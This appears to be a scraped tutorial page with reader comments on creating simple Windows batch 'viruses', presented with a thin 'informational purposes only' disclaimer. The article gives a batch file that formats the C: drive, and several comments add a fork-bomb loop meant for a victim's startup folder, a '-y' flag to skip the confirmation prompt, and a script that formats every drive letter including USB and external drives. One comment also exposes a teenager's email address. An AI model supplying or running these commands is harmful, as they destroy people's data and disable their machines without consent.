I know this is going to be controversial. This is for informational purposes only. DO NOT spread or release the viruses created in this article. This will land you in jail. I am going to teach you how to create a virus. One very basic batch virus to code yourself and two virus construction kits.
DO NOT RELEASE THESE VIRUSES.
Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press... Right?
I do not believe this to be a violation of the Instructables TOS, as I discourage you from releasing the viruses and I do not give you the viruses, I simply tell you how to create them.
DO NOT RELEASE THESE VIRUSES.
Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press... Right?
I do not believe this to be a violation of the Instructables TOS, as I discourage you from releasing the viruses and I do not give you the viruses, I simply tell you how to create them.
Remove these ads by
Signing UpStep 1DIY (very) Basic Batch Script That Does Essentially Nothing
Please note new title. You may wish to skip to the next step.
What you should do here is to open a window of notepad. Enter
and save the file as disk_destroyer_basic.bat.
This won't spread or do anything fancy. It will just wipe your hard disk. There are a few quirks to be worked out with this method, but like I said, informational purposes only.
What you should do here is to open a window of notepad. Enter
FORMAT C:
and save the file as disk_destroyer_basic.bat.
This won't spread or do anything fancy. It will just wipe your hard disk. There are a few quirks to be worked out with this method, but like I said, informational purposes only.
| « Previous Step | Download PDFView All Steps | Next Step » |





























Im 16 and havent a clue about creating my own hack, i know theres ones you just type in notepad and save as .bat and hundreds of other file extensions.
I was wondering how do I learn to hack? xD As in the serious stuff firewalls etc just for educational purposes (: . I understand it'll take years and years of practice, but where should I begin? Which are the best languages i should learn? c++?
My email is breakfloortf2@hotmail.co.uk
Thanks
- John (:
:A
start
start
start
goto A
then save it as all file types, and at the end of the filename put .bat , then simply put in the victims startup folder, and the computer will crash every time windows is turned on
Another reason to put FORMAT C: -y is that just FORMAT C: asks the user if they want to wipe their ow hd, to which they will say no. FORMAT C: -y will perform the same operation, but without needing confirmation.
@ echo off
format A: -y
format B: -y
and so on for all the letters of the alphabet. This will not only wipe all the partitions on the computers main drive, but also any other devices connected to it, such as usb sticks, cds and external hard drives.